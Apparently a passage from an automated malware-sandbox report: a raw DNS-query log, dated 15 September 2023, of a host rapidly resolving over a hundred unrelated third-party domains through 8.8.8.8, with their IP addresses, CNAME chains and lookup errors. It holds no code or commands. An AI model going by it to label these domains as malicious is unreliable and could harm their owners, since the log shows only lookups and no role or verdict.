                                                                                                                                                                              Sep 15, 2023 07:28:20.013734102 CEST8.8.8.8192.168.2.30x511cNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.013734102 CEST8.8.8.8192.168.2.30x511cNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.013734102 CEST8.8.8.8192.168.2.30x511cNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.098788023 CEST8.8.8.8192.168.2.30x98cfServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.122862101 CEST8.8.8.8192.168.2.30xd475No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.198966026 CEST8.8.8.8192.168.2.30xeb96No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.292565107 CEST8.8.8.8192.168.2.30x1ba9No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.342008114 CEST8.8.8.8192.168.2.30xaa9aNo error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.342222929 CEST8.8.8.8192.168.2.30xd76eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.342233896 CEST8.8.8.8192.168.2.30xd96bServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.383482933 CEST8.8.8.8192.168.2.30x6161No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.386997938 CEST8.8.8.8192.168.2.30x18d2No error (0)amele.com198.199.86.58A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.464061975 CEST8.8.8.8192.168.2.30xd9f0Server failure (2)com-edit.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.482028008 CEST8.8.8.8192.168.2.30x77b4No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.489516973 CEST8.8.8.8192.168.2.30xce9fNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.489516973 CEST8.8.8.8192.168.2.30xce9fNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.490662098 CEST8.8.8.8192.168.2.30x1aabNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.507110119 CEST8.8.8.8192.168.2.30xa1ecNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.533026934 CEST8.8.8.8192.168.2.30xb7ccNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.533026934 CEST8.8.8.8192.168.2.30xb7ccNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.591026068 CEST8.8.8.8192.168.2.30xfed3No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.593441963 CEST8.8.8.8192.168.2.30x3f11No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.596947908 CEST8.8.8.8192.168.2.30xe493No error (0)www.cokocoko.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.596947908 CEST8.8.8.8192.168.2.30xe493No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.596947908 CEST8.8.8.8192.168.2.30xe493No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.596947908 CEST8.8.8.8192.168.2.30xe493No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.655606031 CEST8.8.8.8192.168.2.30x3748Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.723160028 CEST8.8.8.8192.168.2.30x9e7fNo error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.723160028 CEST8.8.8.8192.168.2.30x9e7fNo error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.737096071 CEST8.8.8.8192.168.2.30xfb9aNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.737096071 CEST8.8.8.8192.168.2.30xfb9aNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.759300947 CEST8.8.8.8192.168.2.30x3ff9Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.857686043 CEST8.8.8.8192.168.2.30x4c6fName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.885835886 CEST8.8.8.8192.168.2.30x2805No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.895565033 CEST8.8.8.8192.168.2.30xf999Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.900770903 CEST8.8.8.8192.168.2.30xb97dNo error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.910229921 CEST8.8.8.8192.168.2.30x90b8Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.998769045 CEST8.8.8.8192.168.2.30xeae6Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.094284058 CEST8.8.8.8192.168.2.30xb6bfNo error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.102796078 CEST8.8.8.8192.168.2.30x22c7Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.233989954 CEST8.8.8.8192.168.2.30xcac0No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.298933029 CEST8.8.8.8192.168.2.30x436fNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.298933029 CEST8.8.8.8192.168.2.30x436fNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.300533056 CEST8.8.8.8192.168.2.30x6614Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.334429979 CEST8.8.8.8192.168.2.30x151aNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.334429979 CEST8.8.8.8192.168.2.30x151aNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.373224020 CEST8.8.8.8192.168.2.30xd76eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.386630058 CEST8.8.8.8192.168.2.30xff8bNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.387420893 CEST8.8.8.8192.168.2.30xa8a5No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.399920940 CEST8.8.8.8192.168.2.30x42edNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.401546955 CEST8.8.8.8192.168.2.30x9b94Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.438236952 CEST8.8.8.8192.168.2.30xa795No error (0)vivastay.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.438236952 CEST8.8.8.8192.168.2.30xa795No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.438236952 CEST8.8.8.8192.168.2.30xa795No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.438236952 CEST8.8.8.8192.168.2.30xa795No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.452111959 CEST8.8.8.8192.168.2.30xfaeeNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.455897093 CEST8.8.8.8192.168.2.30x10f3No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.465488911 CEST8.8.8.8192.168.2.30xaa9aNo error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.478948116 CEST8.8.8.8192.168.2.30xe000No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.500585079 CEST8.8.8.8192.168.2.30x6f9dName error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.607016087 CEST8.8.8.8192.168.2.30x4e59No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.607016087 CEST8.8.8.8192.168.2.30x4e59No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.653589964 CEST8.8.8.8192.168.2.30x31caNo error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.659641027 CEST8.8.8.8192.168.2.30x2c70No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.685134888 CEST8.8.8.8192.168.2.30x34fcNo error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.685134888 CEST8.8.8.8192.168.2.30x34fcNo error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.718960047 CEST8.8.8.8192.168.2.30xe0e2No error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.745410919 CEST8.8.8.8192.168.2.30x345aNo error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.745410919 CEST8.8.8.8192.168.2.30x345aNo error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.745410919 CEST8.8.8.8192.168.2.30x345aNo error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.755191088 CEST8.8.8.8192.168.2.30x87f7No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.782906055 CEST8.8.8.8192.168.2.30x539Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.793173075 CEST8.8.8.8192.168.2.30xc363No error (0)wvs-net.de104.21.43.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.793173075 CEST8.8.8.8192.168.2.30xc363No error (0)wvs-net.de172.67.181.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.798240900 CEST8.8.8.8192.168.2.30x559cName error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.848819017 CEST8.8.8.8192.168.2.30x6847No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.860109091 CEST8.8.8.8192.168.2.30xa8ffNo error (0)kallman.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.872818947 CEST8.8.8.8192.168.2.30xee14Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.900079966 CEST8.8.8.8192.168.2.30xf96Name error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.903831005 CEST8.8.8.8192.168.2.30x2b68No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.903831005 CEST8.8.8.8192.168.2.30x2b68No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.903831005 CEST8.8.8.8192.168.2.30x2b68No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.903831005 CEST8.8.8.8192.168.2.30x2b68No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.908795118 CEST8.8.8.8192.168.2.30xcf66No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.935664892 CEST8.8.8.8192.168.2.30x7098No error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.942600012 CEST8.8.8.8192.168.2.30xdf02No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.942600012 CEST8.8.8.8192.168.2.30xdf02No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.958498001 CEST8.8.8.8192.168.2.30x56b2No error (0)kallman.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.963258028 CEST8.8.8.8192.168.2.30xb287No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.983681917 CEST8.8.8.8192.168.2.30xb349No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.021100998 CEST8.8.8.8192.168.2.30x2c15Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.050684929 CEST8.8.8.8192.168.2.30xf7e3Name error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.111839056 CEST8.8.8.8192.168.2.30x1996No error (0)kallman.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.113555908 CEST8.8.8.8192.168.2.30xc845No error (0)oozkranj.com212.44.102.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.142518044 CEST8.8.8.8192.168.2.30x6d49No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.144592047 CEST8.8.8.8192.168.2.30xe6faNo error (0)aiolos-sa.gr104.21.26.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.144592047 CEST8.8.8.8192.168.2.30xe6faNo error (0)aiolos-sa.gr172.67.168.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.152431965 CEST8.8.8.8192.168.2.30x7057No error (0)cjcagent.com72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.168201923 CEST8.8.8.8192.168.2.30xb6d2No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.168201923 CEST8.8.8.8192.168.2.30xb6d2No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.184279919 CEST8.8.8.8192.168.2.30x969No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.211631060 CEST8.8.8.8192.168.2.30xa345No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.248080015 CEST8.8.8.8192.168.2.30xa9d9No error (0)araax.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.248080015 CEST8.8.8.8192.168.2.30xa9d9No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.248080015 CEST8.8.8.8192.168.2.30xa9d9No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.248080015 CEST8.8.8.8192.168.2.30xa9d9No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.280884027 CEST8.8.8.8192.168.2.30xda02No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.280884027 CEST8.8.8.8192.168.2.30xda02No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.282958031 CEST8.8.8.8192.168.2.30xa41Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.310514927 CEST8.8.8.8192.168.2.30x375fNo error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.364926100 CEST8.8.8.8192.168.2.30x88fNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.364926100 CEST8.8.8.8192.168.2.30x88fNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.364926100 CEST8.8.8.8192.168.2.30x88fNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.376075983 CEST8.8.8.8192.168.2.30x1335No error (0)anduran.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.376075983 CEST8.8.8.8192.168.2.30x1335No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.376075983 CEST8.8.8.8192.168.2.30x1335No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.376075983 CEST8.8.8.8192.168.2.30x1335No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.393060923 CEST8.8.8.8192.168.2.30xec55No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.450125933 CEST8.8.8.8192.168.2.30x22f4Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.455470085 CEST8.8.8.8192.168.2.30xbd3dServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.458000898 CEST8.8.8.8192.168.2.30x87d1No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.463875055 CEST8.8.8.8192.168.2.30x6e6dServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.474592924 CEST8.8.8.8192.168.2.30x3807Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.505270958 CEST8.8.8.8192.168.2.30xa94cName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.507545948 CEST8.8.8.8192.168.2.30xa179Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.520539999 CEST8.8.8.8192.168.2.30x624eNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.573704958 CEST8.8.8.8192.168.2.30x7d2bNo error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.573704958 CEST8.8.8.8192.168.2.30x7d2bNo error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.573754072 CEST8.8.8.8192.168.2.30xc16No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.581615925 CEST8.8.8.8192.168.2.30x5cdName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.599929094 CEST8.8.8.8192.168.2.30x9623Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.604034901 CEST8.8.8.8192.168.2.30x1965Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.615655899 CEST8.8.8.8192.168.2.30x996cNo error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.615655899 CEST8.8.8.8192.168.2.30x996cNo error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.615655899 CEST8.8.8.8192.168.2.30x996cNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.646548033 CEST8.8.8.8192.168.2.30xa9f3No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.649107933 CEST8.8.8.8192.168.2.30x8baName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.650903940 CEST8.8.8.8192.168.2.30x8303No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.678050041 CEST8.8.8.8192.168.2.30xc397No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.678050041 CEST8.8.8.8192.168.2.30xc397No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.678050041 CEST8.8.8.8192.168.2.30xc397No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.678050041 CEST8.8.8.8192.168.2.30xc397No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.678894997 CEST8.8.8.8192.168.2.30xc4c4No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.686676979 CEST8.8.8.8192.168.2.30x98c3Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.704336882 CEST8.8.8.8192.168.2.30xb2b4Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.705815077 CEST8.8.8.8192.168.2.30xd4caName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.726589918 CEST8.8.8.8192.168.2.30x5f96Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.734246016 CEST8.8.8.8192.168.2.30xde02No error (0)cjcagent.com72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.753613949 CEST8.8.8.8192.168.2.30x42fbName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.816339016 CEST8.8.8.8192.168.2.30x2173No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.816339016 CEST8.8.8.8192.168.2.30x2173No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.820657969 CEST8.8.8.8192.168.2.30x5b6bName error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.821561098 CEST8.8.8.8192.168.2.30xfbb4No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.846007109 CEST8.8.8.8192.168.2.30xdcf7Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.855108023 CEST8.8.8.8192.168.2.30x6617Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.858124971 CEST8.8.8.8192.168.2.30x3ba1No error (0)webways.com172.67.128.139A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.858124971 CEST8.8.8.8192.168.2.30x3ba1No error (0)webways.com104.21.1.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.911684036 CEST8.8.8.8192.168.2.30x9bb9Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.925229073 CEST8.8.8.8192.168.2.30x3e63Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.933697939 CEST8.8.8.8192.168.2.30x9bf3Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.943747997 CEST8.8.8.8192.168.2.30x87deName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.948812008 CEST8.8.8.8192.168.2.30x9716Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.954082966 CEST8.8.8.8192.168.2.30xc266No error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.981403112 CEST8.8.8.8192.168.2.30x94d7No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.981403112 CEST8.8.8.8192.168.2.30x94d7No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.995714903 CEST8.8.8.8192.168.2.30x8d78No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.996345997 CEST8.8.8.8192.168.2.30x2f30No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.998400927 CEST8.8.8.8192.168.2.30x8d78No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
